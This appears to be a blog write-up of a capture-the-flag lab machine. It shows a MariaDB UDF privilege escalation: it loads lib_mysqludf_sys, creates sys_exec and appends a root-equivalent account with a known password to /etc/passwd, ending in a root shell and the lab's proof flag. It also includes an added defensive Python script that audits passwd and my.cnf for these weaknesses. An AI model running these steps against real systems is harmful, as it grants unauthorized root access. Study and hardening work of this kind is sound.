root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
carlos@sundown:/tmp$ su - Dave
su: user Dave does not exist
carlos@sundown:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69134
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+-----------------------------------------------------------------------------------------+
| sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+-----------------------------------------------------------------------------------------+
|                                                                                       0 |
+-----------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
carlos@sundown:/tmp$ su - Dave
Password: 
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# cd /root
root@sundown:~# ls -alh
total 28K
drwx------  3 root root 4.0K Aug  3  2020 .
drwxr-xr-x 18 root root 4.0K Aug  3  2020 ..
lrwxrwxrwx  1 root root    9 Aug  3  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Aug  3  2020 .local
lrwxrwxrwx  1 root root    9 Aug  3  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 1.3K Aug  3  2020 proof.txt
-rw-r--r--  1 root root   66 Aug  3  2020 .selected_editor
root@sundown:~# cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~# 
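The linpeas "Superusers" finding and the line appended to /etc/passwd at the end come down to the same thing: an account other than root with UID 0. Because the mysql account resolves to UID 0, the database server itself runs as root, which is what let the UDF write into plugin_dir and append to /etc/passwd; the first echo with curly quotes produced a line su could not match, the straight-quoted one produced a working root account. The Python script below is an added example, not from the original post or from linpeas: it parses /etc/passwd and a my.cnf-style file and reports those preconditions (extra UID-0 accounts, a hash stored in passwd instead of shadow, malformed entries, an unset or empty `secure_file_priv`, and a server `user` that maps to UID 0). The passwd excerpt is taken from the write-up's final `cat /etc/passwd`; the my.cnf fragments and `FIXED_PASSWD` are constructed, and `mysql` as the default server user is an assumption.

```python
"""Added example: audit /etc/passwd and the MariaDB/MySQL config for the
preconditions behind the UDF privilege escalation (not from the original post)."""
import re

# Login-name characters accepted by this audit. The curly quote that echo wrote
# verbatim into /etc/passwd fails it, so that line is reported as malformed.
VALID_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def parse_passwd(text):
    """Parse passwd-format text into dicts; malformed lines carry a non-None 'error'."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        entry = {"line": lineno, "raw": line, "error": None}
        if len(fields) != 7:
            entry["error"] = f"expected 7 fields, got {len(fields)}"
        else:
            name, pw, uid, gid, gecos, home, shell = fields
            entry.update(name=name, pw=pw, gecos=gecos, home=home, shell=shell)
            if not VALID_NAME.match(name):
                entry["error"] = f"invalid user name {name!r}"
            elif not (uid.isdigit() and gid.isdigit()):
                entry["error"] = "non-numeric uid/gid"
            else:
                entry.update(uid=int(uid), gid=int(gid))
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return (line, finding, detail) tuples: malformed, extra-uid0, hash-in-passwd."""
    findings = []
    for e in parse_passwd(text):
        if e["error"]:
            findings.append((e["line"], "malformed", e["error"]))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], "extra-uid0", e["name"]))
        # 'x' means the hash lives in /etc/shadow; '*' and '!...' are locked accounts.
        if e["pw"] not in ("x", "*", "") and not e["pw"].startswith("!"):
            findings.append((e["line"], "hash-in-passwd", e["name"]))
    return findings


def parse_mycnf(text):
    """Minimal my.cnf parser: {section: {key: value}}; bare options map to None.
    Comments and !include/!includedir lines are skipped (values containing '#' are not handled)."""
    cfg, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("!"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            cfg.setdefault(section, {})
            continue
        if section is None:
            continue
        key, sep, value = line.partition("=")
        key = key.strip().replace("-", "_")  # my.cnf accepts both spellings
        cfg[section][key] = value.strip().strip("\"'") if sep else None
    return cfg


def audit_mysqld(cfg, passwd_text):
    """Return (setting, current, recommended) for the server-side weaknesses."""
    mysqld = cfg.get("mysqld", {})
    findings = []
    # Empty/unset: LOAD_FILE() and INTO DUMPFILE may touch any path the server can.
    if not mysqld.get("secure_file_priv"):
        findings.append(("secure_file_priv", mysqld.get("secure_file_priv"),
                         "a dedicated directory such as /var/lib/mysql-files"))
    user = mysqld.get("user") or "mysql"  # assumption: Debian's default service user
    uids = {e["name"]: e["uid"] for e in parse_passwd(passwd_text) if not e["error"]}
    if uids.get(user) == 0:
        findings.append(("user", f"{user} (uid 0)", "an unprivileged account with its own uid"))
    return findings


# Excerpt of the /etc/passwd shown in the write-up after the two sys_exec() calls.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
\u201cDave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash\u201d
Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""
# Constructed: how the mysql entry should look, and the weak vs. hardened config.
FIXED_PASSWD = "root:x:0:0:root:/root:/bin/bash\nmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false\n"
WEAK_MYCNF = "[mysqld]\nuser = mysql\nsecure-file-priv =\n"
HARDENED_MYCNF = "[mysqld]\nuser = mysql\nsecure-file-priv = /var/lib/mysql-files\n"

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print("passwd line %d: %s %s" % f)
    for f in audit_mysqld(parse_mycnf(WEAK_MYCNF), SAMPLE_PASSWD):
        print("mysqld %s=%r, recommended: %s" % f)
```

Run against the excerpt, the audit reports mysql and Dave as extra UID-0 accounts, the curly-quoted line as malformed, and Dave's DES-style hash as living in passwd rather than shadow; with the hardened config and a mysql account that has its own uid, `audit_mysqld` returns nothing.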

Steps (with straight ASCII quotes; the curly quotes typed in the session above are what caused the syntax errors):

use mysql;

Create a new table:

create table potato(line blob);

insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));

SHOW VARIABLES LIKE '%plugin%';

select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';

create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';

select sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');

Here the username is Dave and the password is Password@973.

posted @ 2022-11-12 22:36  Jason_huawen  129 reads, 0 comments